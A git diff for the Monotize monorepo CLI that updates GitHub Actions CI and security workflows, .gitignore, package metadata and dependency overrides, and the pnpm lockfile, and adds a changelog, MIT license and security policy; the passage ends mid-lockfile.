diff --git a/.github/code-scanning.yml b/.github/code-scanning.yml deleted file mode 100644 index 79a28a1..0000000 --- a/.github/code-scanning.yml +++ /dev/null @@ -1,24 +0,0 @@ -# Configuration for GitHub's default code scanning -# This controls the automatic CodeQL analysis run by GitHub Advanced Security - -name: "Default Code Scanning Config" - -# Use only security queries, not code quality -queries: - - uses: security-extended - -# Exclude queries that cause false positives -query-filters: - - exclude: - id: js/unused-local-variable - - exclude: - id: js/insecure-temporary-file - -# Exclude test files from analysis -paths-ignore: - - tests/** - - "**/*.test.ts" - - "**/*.spec.ts" - - node_modules/** - - "**/__tests__/**" - - "**/__mocks__/**" diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index fd80e85..f3165fb 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -49,13 +49,43 @@ jobs: done echo "No sensitive files found" - test: - name: Test (Node ${{ matrix.node-version }}) + dependency-freshness: + name: Dependency Freshness runs-on: ubuntu-latest needs: safety-check + + steps: + - name: Checkout + uses: actions/checkout@v4 + + - name: Install pnpm + uses: pnpm/action-setup@v4 + with: + version: 9 + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: 'pnpm' + + - name: Install dependencies + run: pnpm install --frozen-lockfile + + - name: Report outdated dependencies + run: | + if ! pnpm outdated; then + echo "::notice::Outdated dependencies detected. See log above." 
+ fi + + test: + name: Test (Node ${{ matrix.node-version }}, ${{ matrix.os }}) + runs-on: ${{ matrix.os }} + needs: [safety-check, dependency-freshness] strategy: matrix: node-version: [18, 20, 22] + os: [ubuntu-latest, macos-latest, windows-latest] fail-fast: false steps: @@ -79,6 +109,11 @@ jobs: - name: Build run: pnpm build + - name: CLI smoke test + run: | + node dist/index.js --version + node dist/index.js merge --help + - name: Type check run: pnpm typecheck @@ -336,3 +371,43 @@ jobs: fi echo "History preserved successfully with $COMMIT_COUNT commits" timeout-minutes: 5 + + smoke-test: + name: Publish Smoke Test + runs-on: ubuntu-latest + needs: test + + steps: + - name: Checkout + uses: actions/checkout@v4 + + - name: Install pnpm + uses: pnpm/action-setup@v4 + with: + version: 9 + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: 'pnpm' + + - name: Install dependencies + run: pnpm install --frozen-lockfile + + - name: Build + run: pnpm build + + - name: Verify built CLI works + run: | + node dist/index.js --version + node dist/index.js merge --help + + - name: Type-check tests + run: pnpm tsc -p tests/tsconfig.json --noEmit + + - name: Publish dry run + run: | + npm pack --dry-run 2>&1 | tee pack-output.txt + echo "--- Package contents ---" + cat pack-output.txt diff --git a/.github/workflows/security.yml b/.github/workflows/security.yml index 092ba40..bd39bb1 100644 --- a/.github/workflows/security.yml +++ b/.github/workflows/security.yml @@ -34,7 +34,6 @@ jobs: - name: Run pnpm audit run: pnpm audit --audit-level=high - continue-on-error: true codeql: name: CodeQL Analysis @@ -113,4 +112,4 @@ jobs: with: scan-args: |- --lockfile=pnpm-lock.yaml - fail-on-vuln: false + fail-on-vuln: true diff --git a/.gitignore b/.gitignore old mode 100644 new mode 100755 index 020a4d5..e6e3a4d --- a/.gitignore +++ b/.gitignore @@ -2,8 +2,19 @@ node_modules/ dist/ *.log .DS_Store +._* coverage/ .env .env.local tests/.temp/ 
tests/.test-output/ + +# Local runtime/workspace artifacts from monotize runs +.monotize/ +monorepo/ +/packages/ +monorepo.staging-*/ +monorepo.staging-*.ops.jsonl + +# Local assistant/editor state +.claude/ diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100755 index 0000000..21b9005 --- /dev/null +++ b/.vscode/settings.json @@ -0,0 +1,5 @@ +{ + "files.exclude": { + "**/._*": true + } +} diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100755 index 0000000..a5b274a --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,33 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] + +### Added +- Full lifecycle CLI commands: `add`, `archive`, `configure`, `migrate-branch` +- Extended analysis engine with environment, tooling, CI, publishing, and repo risk detection +- Risk classification system (straightforward / needs-decisions / complex) +- Path-filtered GitHub Actions workflow generation +- Configure engine for Prettier, ESLint, and TypeScript scaffolding +- Dependency enforcement via package manager overrides/resolutions +- Multi-language detection (Go, Rust, Python) with workspace scaffolding +- Smart defaults with evidence-based suggestions +- Performance utilities (concurrent mapping, disk space checks, progress events) +- Cross-platform path normalization +- 8-step wizard UI with SeverityBadge, DiffViewer, TreePreview, FindingsFilter components + +### Security +- Fixed Python injection vulnerability in history preservation (SEC-01) +- Fixed path traversal vulnerability in apply command (SEC-02) +- Added install command executable allowlist (SEC-04) +- Replaced shell `exec()` with `execFile()` in browser opener (SEC-05) +- Added server authentication via shared-secret token (SEC-03) +- Added CORS, rate limiting, and body 
size limits to server +- Added symlink protection to file operations + +### Fixed +- Async `.filter()` bug in gitignore merge that caused all paths to be included diff --git a/LICENSE b/LICENSE new file mode 100755 index 0000000..08f24ef --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2026 pmclSF + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/SECURITY.md b/SECURITY.md new file mode 100755 index 0000000..b1996d7 --- /dev/null +++ b/SECURITY.md @@ -0,0 +1,25 @@ +# Security Policy + +## Supported Versions + +| Version | Supported | +| ------- | ------------------ | +| 0.x.x | :white_check_mark: | + +## Reporting a Vulnerability + +If you discover a security vulnerability in Monotize, please report it responsibly: + +1. **Do not** open a public GitHub issue for security vulnerabilities +2. Email the maintainer or use [GitHub Security Advisories](https://github.com/pmclSF/monotize/security/advisories/new) +3. 
Include a description of the vulnerability, steps to reproduce, and potential impact +4. Allow up to 72 hours for an initial response + +## Security Considerations + +Monotize executes git commands and package manager operations on your behalf. When using it: + +- Only merge repositories you trust +- Review plan files before applying them with `monotize apply` +- The web UI server (`monotize ui`) binds to localhost with token authentication — do not expose it to untrusted networks +- Never embed credentials directly in repository URLs — use SSH keys or credential helpers instead diff --git a/package.json b/package.json index 741adea..37a30d9 100755 --- a/package.json +++ b/package.json @@ -1,10 +1,25 @@ { - "name": "monorepo-cli", + "name": "monotize", "version": "0.2.0", "description": "Combine multiple Git repositories into a monorepo with pnpm, yarn, or npm workspace support", "type": "module", + "author": "pmclSF", + "repository": { + "type": "git", + "url": "https://github.com/pmclSF/monotize.git" + }, + "homepage": "https://github.com/pmclSF/monotize#readme", + "bugs": { + "url": "https://github.com/pmclSF/monotize/issues" + }, + "files": [ + "dist", + "bin", + "README.md", + "LICENSE" + ], "bin": { - "monorepo": "./bin/monorepo.js", + "monotize": "./bin/monorepo.js", "mr": "./bin/monorepo.js" }, "exports": "./dist/index.js", @@ -33,13 +48,17 @@ "commander": "^12.0.0", "express": "^5.2.1", "fs-extra": "^11.2.0", + "js-yaml": "^4.1.1", + "semver": "^7.7.3", "simple-git": "^3.22.0", "ws": "^8.19.0" }, "devDependencies": { "@types/express": "^5.0.6", "@types/fs-extra": "^11.0.0", + "@types/js-yaml": "^4.0.9", "@types/node": "^20.0.0", + "@types/semver": "^7.5.0", "@types/supertest": "^7.2.0", "@types/ws": "^8.18.1", "@vitest/coverage-v8": "^2.0.0", @@ -59,5 +78,12 @@ "turborepo", "nx" ], + "pnpm": { + "overrides": { + "esbuild": ">=0.25.0", + "minimatch": ">=9.0.7", + "rollup": ">=4.59.0" + } + }, "license": "MIT" } diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml 
index 351d74c..c21a842 100755 --- a/pnpm-lock.yaml +++ b/pnpm-lock.yaml @@ -4,6 +4,11 @@ settings: autoInstallPeers: true excludeLinksFromLockfile: false +overrides: + esbuild: '>=0.25.0' + minimatch: '>=9.0.7' + rollup: '>=4.59.0' + importers: .: @@ -23,6 +28,12 @@ importers: fs-extra: specifier: ^11.2.0 version: 11.3.3 + js-yaml: + specifier: ^4.1.1 + version: 4.1.1 + semver: + specifier: ^7.7.3 + version: 7.7.3 simple-git: specifier: ^3.22.0 version: 3.30.0 @@ -36,9 +47,15 @@ importers: '@types/fs-extra': specifier: ^11.0.0 version: 11.0.4 + '@types/js-yaml': + specifier: ^4.0.9 + version: 4.0.9 '@types/node': specifier: ^20.0.0 version: 20.19.31 + '@types/semver': + specifier: ^7.5.0 + version: 7.7.1 '@types/supertest': specifier: ^7.2.0 version: 7.2.0 @@ -87,204 +104,102 @@ packages: '@bcoe/v8-coverage@0.2.3': resolution: {integrity: sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==} - '@esbuild/aix-ppc64@0.21.5': - resolution: {integrity: sha512-1SDgH6ZSPTlggy1yI6+Dbkiz8xzpHJEVAlF/AM1tHPLsf5STom9rwtjE4hKAF20FfXXNTFqEYXyJNWh1GiZedQ==} - engines: {node: '>=12'} - cpu: [ppc64] - os: [aix] - '@esbuild/aix-ppc64@0.27.2': resolution: {integrity: sha512-GZMB+a0mOMZs4MpDbj8RJp4cw+w1WV5NYD6xzgvzUJ5Ek2jerwfO2eADyI6ExDSUED+1X8aMbegahsJi+8mgpw==} engines: {node: '>=18'} cpu: [ppc64] os: [aix] - '@esbuild/android-arm64@0.21.5': - resolution: {integrity: sha512-c0uX9VAUBQ7dTDCjq+wdyGLowMdtR/GoC2U5IYk/7D1H1JYC0qseD7+11iMP2mRLN9RcCMRcjC4YMclCzGwS/A==} - engines: {node: '>=12'} - cpu: [arm64] - os: [android] - '@esbuild/android-arm64@0.27.2': resolution: {integrity: sha512-pvz8ZZ7ot/RBphf8fv60ljmaoydPU12VuXHImtAs0XhLLw+EXBi2BLe3OYSBslR4rryHvweW5gmkKFwTiFy6KA==} engines: {node: '>=18'} cpu: [arm64] os: [android] - '@esbuild/android-arm@0.21.5': - resolution: {integrity: sha512-vCPvzSjpPHEi1siZdlvAlsPxXl7WbOVUBBAowWug4rJHb68Ox8KualB+1ocNvT5fjv6wpkX6o/iEpbDrf68zcg==} - engines: {node: '>=12'} - cpu: [arm] - os: [android] - 
'@esbuild/android-arm@0.27.2': resolution: {integrity: sha512-DVNI8jlPa7Ujbr1yjU2PfUSRtAUZPG9I1RwW4F4xFB1Imiu2on0ADiI/c3td+KmDtVKNbi+nffGDQMfcIMkwIA==} engines: {node: '>=18'} cpu: [arm] os: [android] - '@esbuild/android-x64@0.21.5': - resolution: {integrity: sha512-D7aPRUUNHRBwHxzxRvp856rjUHRFW1SdQATKXH2hqA0kAZb1hKmi02OpYRacl0TxIGz/ZmXWlbZgjwWYaCakTA==} - engines: {node: '>=12'} - cpu: [x64] - os: [android] - '@esbuild/android-x64@0.27.2': resolution: {integrity: sha512-z8Ank4Byh4TJJOh4wpz8g2vDy75zFL0TlZlkUkEwYXuPSgX8yzep596n6mT7905kA9uHZsf/o2OJZubl2l3M7A==} engines: {node: '>=18'} cpu: [x64] os: [android] - '@esbuild/darwin-arm64@0.21.5': - resolution: {integrity: sha512-DwqXqZyuk5AiWWf3UfLiRDJ5EDd49zg6O9wclZ7kUMv2WRFr4HKjXp/5t8JZ11QbQfUS6/cRCKGwYhtNAY88kQ==} - engines: {node: '>=12'} - cpu: [arm64] - os: [darwin] - '@esbuild/darwin-arm64@0.27.2': resolution: {integrity: sha512-davCD2Zc80nzDVRwXTcQP/28fiJbcOwvdolL0sOiOsbwBa72kegmVU0Wrh1MYrbuCL98Omp5dVhQFWRKR2ZAlg==} engines: {node: '>=18'} cpu: [arm64] os: [darwin] - '@esbuild/darwin-x64@0.21.5': - resolution: {integrity: sha512-se/JjF8NlmKVG4kNIuyWMV/22ZaerB+qaSi5MdrXtd6R08kvs2qCN4C09miupktDitvh8jRFflwGFBQcxZRjbw==} - engines: {node: '>=12'} - cpu: [x64] - os: [darwin] - '@esbuild/darwin-x64@0.27.2': resolution: {integrity: sha512-ZxtijOmlQCBWGwbVmwOF/UCzuGIbUkqB1faQRf5akQmxRJ1ujusWsb3CVfk/9iZKr2L5SMU5wPBi1UWbvL+VQA==} engines: {node: '>=18'} cpu: [x64] os: [darwin] - '@esbuild/freebsd-arm64@0.21.5': - resolution: {integrity: sha512-5JcRxxRDUJLX8JXp/wcBCy3pENnCgBR9bN6JsY4OmhfUtIHe3ZW0mawA7+RDAcMLrMIZaf03NlQiX9DGyB8h4g==} - engines: {node: '>=12'} - cpu: [arm64] - os: [freebsd] - '@esbuild/freebsd-arm64@0.27.2': resolution: {integrity: sha512-lS/9CN+rgqQ9czogxlMcBMGd+l8Q3Nj1MFQwBZJyoEKI50XGxwuzznYdwcav6lpOGv5BqaZXqvBSiB/kJ5op+g==} engines: {node: '>=18'} cpu: [arm64] os: [freebsd] - '@esbuild/freebsd-x64@0.21.5': - resolution: {integrity: 
sha512-J95kNBj1zkbMXtHVH29bBriQygMXqoVQOQYA+ISs0/2l3T9/kj42ow2mpqerRBxDJnmkUDCaQT/dfNXWX/ZZCQ==} - engines: {node: '>=12'} - cpu: [x64] - os: [freebsd] - '@esbuild/freebsd-x64@0.27.2': resolution: {integrity: sha512-tAfqtNYb4YgPnJlEFu4c212HYjQWSO/w/h/lQaBK7RbwGIkBOuNKQI9tqWzx7Wtp7bTPaGC6MJvWI608P3wXYA==} engines: {node: '>=18'} cpu: [x64] os: [freebsd] - '@esbuild/linux-arm64@0.21.5': - resolution: {integrity: sha512-ibKvmyYzKsBeX8d8I7MH/TMfWDXBF3db4qM6sy+7re0YXya+K1cem3on9XgdT2EQGMu4hQyZhan7TeQ8XkGp4Q==} - engines: {node: '>=12'} - cpu: [arm64] - os: [linux] - '@esbuild/linux-arm64@0.27.2': resolution: {integrity: sha512-hYxN8pr66NsCCiRFkHUAsxylNOcAQaxSSkHMMjcpx0si13t1LHFphxJZUiGwojB1a/Hd5OiPIqDdXONia6bhTw==} engines: {node: '>=18'} cpu: [arm64] os: [linux] - '@esbuild/linux-arm@0.21.5': - resolution: {integrity: sha512-bPb5AHZtbeNGjCKVZ9UGqGwo8EUu4cLq68E95A53KlxAPRmUyYv2D6F0uUI65XisGOL1hBP5mTronbgo+0bFcA==} - engines: {node: '>=12'} - cpu: [arm] - os: [linux] - '@esbuild/linux-arm@0.27.2': resolution: {integrity: sha512-vWfq4GaIMP9AIe4yj1ZUW18RDhx6EPQKjwe7n8BbIecFtCQG4CfHGaHuh7fdfq+y3LIA2vGS/o9ZBGVxIDi9hw==} engines: {node: '>=18'} cpu: [arm] os: [linux] - '@esbuild/linux-ia32@0.21.5': - resolution: {integrity: sha512-YvjXDqLRqPDl2dvRODYmmhz4rPeVKYvppfGYKSNGdyZkA01046pLWyRKKI3ax8fbJoK5QbxblURkwK/MWY18Tg==} - engines: {node: '>=12'} - cpu: [ia32] - os: [linux] - '@esbuild/linux-ia32@0.27.2': resolution: {integrity: sha512-MJt5BRRSScPDwG2hLelYhAAKh9imjHK5+NE/tvnRLbIqUWa+0E9N4WNMjmp/kXXPHZGqPLxggwVhz7QP8CTR8w==} engines: {node: '>=18'} cpu: [ia32] os: [linux] - '@esbuild/linux-loong64@0.21.5': - resolution: {integrity: sha512-uHf1BmMG8qEvzdrzAqg2SIG/02+4/DHB6a9Kbya0XDvwDEKCoC8ZRWI5JJvNdUjtciBGFQ5PuBlpEOXQj+JQSg==} - engines: {node: '>=12'} - cpu: [loong64] - os: [linux] - '@esbuild/linux-loong64@0.27.2': resolution: {integrity: sha512-lugyF1atnAT463aO6KPshVCJK5NgRnU4yb3FUumyVz+cGvZbontBgzeGFO1nF+dPueHD367a2ZXe1NtUkAjOtg==} engines: {node: '>=18'} cpu: [loong64] os: 
[linux] - '@esbuild/linux-mips64el@0.21.5': - resolution: {integrity: sha512-IajOmO+KJK23bj52dFSNCMsz1QP1DqM6cwLUv3W1QwyxkyIWecfafnI555fvSGqEKwjMXVLokcV5ygHW5b3Jbg==} - engines: {node: '>=12'} - cpu: [mips64el] - os: [linux] - '@esbuild/linux-mips64el@0.27.2': resolution: {integrity: sha512-nlP2I6ArEBewvJ2gjrrkESEZkB5mIoaTswuqNFRv/WYd+ATtUpe9Y09RnJvgvdag7he0OWgEZWhviS1OTOKixw==} engines: {node: '>=18'} cpu: [mips64el] os: [linux] - '@esbuild/linux-ppc64@0.21.5': - resolution: {integrity: sha512-1hHV/Z4OEfMwpLO8rp7CvlhBDnjsC3CttJXIhBi+5Aj5r+MBvy4egg7wCbe//hSsT+RvDAG7s81tAvpL2XAE4w==} - engines: {node: '>=12'} - cpu: [ppc64] - os: [linux] - '@esbuild/linux-ppc64@0.27.2': resolution: {integrity: sha512-C92gnpey7tUQONqg1n6dKVbx3vphKtTHJaNG2Ok9lGwbZil6DrfyecMsp9CrmXGQJmZ7iiVXvvZH6Ml5hL6XdQ==} engines: {node: '>=18'} cpu: [ppc64] os: [linux] - '@esbuild/linux-riscv64@0.21.5': - resolution: {integrity: sha512-2HdXDMd9GMgTGrPWnJzP2ALSokE/0O5HhTUvWIbD3YdjME8JwvSCnNGBnTThKGEB91OZhzrJ4qIIxk/SBmyDDA==} - engines: {node: '>=12'} - cpu: [riscv64] - os: [linux] - '@esbuild/linux-riscv64@0.27.2': resolution: {integrity: sha512-B5BOmojNtUyN8AXlK0QJyvjEZkWwy/FKvakkTDCziX95AowLZKR6aCDhG7LeF7uMCXEJqwa8Bejz5LTPYm8AvA==} engines: {node: '>=18'} cpu: [riscv64] os: [linux] - '@esbuild/linux-s390x@0.21.5': - resolution: {integrity: sha512-zus5sxzqBJD3eXxwvjN1yQkRepANgxE9lgOW2qLnmr8ikMTphkjgXu1HR01K4FJg8h1kEEDAqDcZQtbrRnB41A==} - engines: {node: '>=12'} - cpu: [s390x] - os: [linux] - '@esbuild/linux-s390x@0.27.2': resolution: {integrity: sha512-p4bm9+wsPwup5Z8f4EpfN63qNagQ47Ua2znaqGH6bqLlmJ4bx97Y9JdqxgGZ6Y8xVTixUnEkoKSHcpRlDnNr5w==} engines: {node: '>=18'} cpu: [s390x] os: [linux] - '@esbuild/linux-x64@0.21.5': - resolution: {integrity: sha512-1rYdTpyv03iycF1+BhzrzQJCdOuAOtaqHTWJZCWvijKD2N5Xu0TtVC8/+1faWqcP9iBCWOmjmhoH94dH82BxPQ==} - engines: {node: '>=12'} - cpu: [x64] - os: [linux] - '@esbuild/linux-x64@0.27.2': resolution: {integrity: 
sha512-uwp2Tip5aPmH+NRUwTcfLb+W32WXjpFejTIOWZFw/v7/KnpCDKG66u4DLcurQpiYTiYwQ9B7KOeMJvLCu/OvbA==} engines: {node: '>=18'} @@ -297,12 +212,6 @@ packages: cpu: [arm64] os: [netbsd] - '@esbuild/netbsd-x64@0.21.5': - resolution: {integrity: sha512-Woi2MXzXjMULccIwMnLciyZH4nCIMpWQAs049KEeMvOcNADVxo0UBIQPfSmxB3CWKedngg7sWZdLvLczpe0tLg==} - engines: {node: '>=12'} - cpu: [x64] - os: [netbsd] - '@esbuild/netbsd-x64@0.27.2': resolution: {integrity: sha512-HwGDZ0VLVBY3Y+Nw0JexZy9o/nUAWq9MlV7cahpaXKW6TOzfVno3y3/M8Ga8u8Yr7GldLOov27xiCnqRZf0tCA==} engines: {node: '>=18'} @@ -315,12 +224,6 @@ packages: cpu: [arm64] os: [openbsd] - '@esbuild/openbsd-x64@0.21.5': - resolution: {integrity: sha512-HLNNw99xsvx12lFBUwoT8EVCsSvRNDVxNpjZ7bPn947b8gJPzeHWyNVhFsaerc0n3TsbOINvRP2byTZ5LKezow==} - engines: {node: '>=12'} - cpu: [x64] - os: [openbsd] - '@esbuild/openbsd-x64@0.27.2': resolution: {integrity: sha512-/it7w9Nb7+0KFIzjalNJVR5bOzA9Vay+yIPLVHfIQYG/j+j9VTH84aNB8ExGKPU4AzfaEvN9/V4HV+F+vo8OEg==} engines: {node: '>=18'} @@ -333,48 +236,24 @@ packages: cpu: [arm64] os: [openharmony] - '@esbuild/sunos-x64@0.21.5': - resolution: {integrity: sha512-6+gjmFpfy0BHU5Tpptkuh8+uw3mnrvgs+dSPQXQOv3ekbordwnzTVEb4qnIvQcYXq6gzkyTnoZ9dZG+D4garKg==} - engines: {node: '>=12'} - cpu: [x64] - os: [sunos] - '@esbuild/sunos-x64@0.27.2': resolution: {integrity: sha512-kMtx1yqJHTmqaqHPAzKCAkDaKsffmXkPHThSfRwZGyuqyIeBvf08KSsYXl+abf5HDAPMJIPnbBfXvP2ZC2TfHg==} engines: {node: '>=18'} cpu: [x64] os: [sunos] - '@esbuild/win32-arm64@0.21.5': - resolution: {integrity: sha512-Z0gOTd75VvXqyq7nsl93zwahcTROgqvuAcYDUr+vOv8uHhNSKROyU961kgtCD1e95IqPKSQKH7tBTslnS3tA8A==} - engines: {node: '>=12'} - cpu: [arm64] - os: [win32] - '@esbuild/win32-arm64@0.27.2': resolution: {integrity: sha512-Yaf78O/B3Kkh+nKABUF++bvJv5Ijoy9AN1ww904rOXZFLWVc5OLOfL56W+C8F9xn5JQZa3UX6m+IktJnIb1Jjg==} engines: {node: '>=18'} cpu: [arm64] os: [win32] - '@esbuild/win32-ia32@0.21.5': - resolution: {integrity: 
sha512-SWXFF1CL2RVNMaVs+BBClwtfZSvDgtL//G/smwAc5oVK/UPu2Gu9tIaRgFmYFFKrmg3SyAjSrElf0TiJ1v8fYA==} - engines: {node: '>=12'} - cpu: [ia32] - os: [win32] - '@esbuild/win32-ia32@0.27.2': resolution: {integrity: sha512-Iuws0kxo4yusk7sw70Xa2E2imZU5HoixzxfGCdxwBdhiDgt9vX9VUCBhqcwY7/uh//78A1hMkkROMJq9l27oLQ==} engines: {node: '>=18'} cpu: [ia32] os: [win32] - '@esbuild/win32-x64@0.21.5': - resolution: {integrity: sha512-tQd/1efJuzPC6rCFwEvLtci/xNFcTZknmXs98FYDfGE4wP9ClFV98nyKrzJKVPMhdDnjzLhdUyMX4PsQAPjwIw==} - engines: {node: '>=12'} - cpu: [x64] - os: [win32] - '@esbuild/win32-x64@0.27.2': resolution: {integrity: sha512-sRdU18mcKf7F+YgheI/zGf5alZatMUTKj/jNS6l744f9u3WFu4v7twcUI9vu4mknF4Y9aDlblIie0IM+5xxaqQ==} engines: {node: '>=18'} @@ -553,141 +432,141 @@ packages: resolution: {integrity: sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==} engines: {node: '>=14'} - '@rollup/rollup-android-arm-eabi@4.57.1': - resolution: {integrity: sha512-A6ehUVSiSaaliTxai040ZpZ2zTevHYbvu/lDoeAteHI8QnaosIzm4qwtezfRg1jOYaUmnzLX1AOD6Z+UJjtifg==} + '@rollup/rollup-android-arm-eabi@4.59.0': + resolution: {integrity: sha512-upnNBkA6ZH2VKGcBj9Fyl9IGNPULcjXRlg0LLeaioQWueH30p6IXtJEbKAgvyv+mJaMxSm1l6xwDXYjpEMiLMg==} cpu: [arm] os: [android] - '@rollup/rollup-android-arm64@4.57.1': - resolution: {integrity: sha512-dQaAddCY9YgkFHZcFNS/606Exo8vcLHwArFZ7vxXq4rigo2bb494/xKMMwRRQW6ug7Js6yXmBZhSBRuBvCCQ3w==} + '@rollup/rollup-android-arm64@4.59.0': + resolution: {integrity: sha512-hZ+Zxj3SySm4A/DylsDKZAeVg0mvi++0PYVceVyX7hemkw7OreKdCvW2oQ3T1FMZvCaQXqOTHb8qmBShoqk69Q==} cpu: [arm64] os: [android] - '@rollup/rollup-darwin-arm64@4.57.1': - resolution: {integrity: sha512-crNPrwJOrRxagUYeMn/DZwqN88SDmwaJ8Cvi/TN1HnWBU7GwknckyosC2gd0IqYRsHDEnXf328o9/HC6OkPgOg==} + '@rollup/rollup-darwin-arm64@4.59.0': + resolution: {integrity: sha512-W2Psnbh1J8ZJw0xKAd8zdNgF9HRLkdWwwdWqubSVk0pUuQkoHnv7rx4GiF9rT4t5DIZGAsConRE3AxCdJ4m8rg==} cpu: [arm64] os: [darwin] - 
'@rollup/rollup-darwin-x64@4.57.1': - resolution: {integrity: sha512-Ji8g8ChVbKrhFtig5QBV7iMaJrGtpHelkB3lsaKzadFBe58gmjfGXAOfI5FV0lYMH8wiqsxKQ1C9B0YTRXVy4w==} + '@rollup/rollup-darwin-x64@4.59.0': + resolution: {integrity: sha512-ZW2KkwlS4lwTv7ZVsYDiARfFCnSGhzYPdiOU4IM2fDbL+QGlyAbjgSFuqNRbSthybLbIJ915UtZBtmuLrQAT/w==} cpu: [x64] os: [darwin] - '@rollup/rollup-freebsd-arm64@4.57.1': - resolution: {integrity: sha512-R+/WwhsjmwodAcz65guCGFRkMb4gKWTcIeLy60JJQbXrJ97BOXHxnkPFrP+YwFlaS0m+uWJTstrUA9o+UchFug==} + '@rollup/rollup-freebsd-arm64@4.59.0': + resolution: {integrity: sha512-EsKaJ5ytAu9jI3lonzn3BgG8iRBjV4LxZexygcQbpiU0wU0ATxhNVEpXKfUa0pS05gTcSDMKpn3Sx+QB9RlTTA==} cpu: [arm64] os: [freebsd] - '@rollup/rollup-freebsd-x64@4.57.1': - resolution: {integrity: sha512-IEQTCHeiTOnAUC3IDQdzRAGj3jOAYNr9kBguI7MQAAZK3caezRrg0GxAb6Hchg4lxdZEI5Oq3iov/w/hnFWY9Q==} + '@rollup/rollup-freebsd-x64@4.59.0': + resolution: {integrity: sha512-d3DuZi2KzTMjImrxoHIAODUZYoUUMsuUiY4SRRcJy6NJoZ6iIqWnJu9IScV9jXysyGMVuW+KNzZvBLOcpdl3Vg==} cpu: [x64] os: [freebsd] - '@rollup/rollup-linux-arm-gnueabihf@4.57.1': - resolution: {integrity: sha512-F8sWbhZ7tyuEfsmOxwc2giKDQzN3+kuBLPwwZGyVkLlKGdV1nvnNwYD0fKQ8+XS6hp9nY7B+ZeK01EBUE7aHaw==} + '@rollup/rollup-linux-arm-gnueabihf@4.59.0': + resolution: {integrity: sha512-t4ONHboXi/3E0rT6OZl1pKbl2Vgxf9vJfWgmUoCEVQVxhW6Cw/c8I6hbbu7DAvgp82RKiH7TpLwxnJeKv2pbsw==} cpu: [arm] os: [linux] libc: [glibc] - '@rollup/rollup-linux-arm-musleabihf@4.57.1': - resolution: {integrity: sha512-rGfNUfn0GIeXtBP1wL5MnzSj98+PZe/AXaGBCRmT0ts80lU5CATYGxXukeTX39XBKsxzFpEeK+Mrp9faXOlmrw==} + '@rollup/rollup-linux-arm-musleabihf@4.59.0': + resolution: {integrity: sha512-CikFT7aYPA2ufMD086cVORBYGHffBo4K8MQ4uPS/ZnY54GKj36i196u8U+aDVT2LX4eSMbyHtyOh7D7Zvk2VvA==} cpu: [arm] os: [linux] libc: [musl] - '@rollup/rollup-linux-arm64-gnu@4.57.1': - resolution: {integrity: sha512-MMtej3YHWeg/0klK2Qodf3yrNzz6CGjo2UntLvk2RSPlhzgLvYEB3frRvbEF2wRKh1Z2fDIg9KRPe1fawv7C+g==} + 
'@rollup/rollup-linux-arm64-gnu@4.59.0': + resolution: {integrity: sha512-jYgUGk5aLd1nUb1CtQ8E+t5JhLc9x5WdBKew9ZgAXg7DBk0ZHErLHdXM24rfX+bKrFe+Xp5YuJo54I5HFjGDAA==} cpu: [arm64] os: [linux] libc: [glibc] - '@rollup/rollup-linux-arm64-musl@4.57.1': - resolution: {integrity: sha512-1a/qhaaOXhqXGpMFMET9VqwZakkljWHLmZOX48R0I/YLbhdxr1m4gtG1Hq7++VhVUmf+L3sTAf9op4JlhQ5u1Q==} + '@rollup/rollup-linux-arm64-musl@4.59.0': + resolution: {integrity: sha512-peZRVEdnFWZ5Bh2KeumKG9ty7aCXzzEsHShOZEFiCQlDEepP1dpUl/SrUNXNg13UmZl+gzVDPsiCwnV1uI0RUA==} cpu: [arm64] os: [linux] libc: [musl] - '@rollup/rollup-linux-loong64-gnu@4.57.1': - resolution: {integrity: sha512-QWO6RQTZ/cqYtJMtxhkRkidoNGXc7ERPbZN7dVW5SdURuLeVU7lwKMpo18XdcmpWYd0qsP1bwKPf7DNSUinhvA==} + '@rollup/rollup-linux-loong64-gnu@4.59.0': + resolution: {integrity: sha512-gbUSW/97f7+r4gHy3Jlup8zDG190AuodsWnNiXErp9mT90iCy9NKKU0Xwx5k8VlRAIV2uU9CsMnEFg/xXaOfXg==} cpu: [loong64] os: [linux] libc: [glibc] - '@rollup/rollup-linux-loong64-musl@4.57.1': - resolution: {integrity: sha512-xpObYIf+8gprgWaPP32xiN5RVTi/s5FCR+XMXSKmhfoJjrpRAjCuuqQXyxUa/eJTdAE6eJ+KDKaoEqjZQxh3Gw==} + '@rollup/rollup-linux-loong64-musl@4.59.0': + resolution: {integrity: 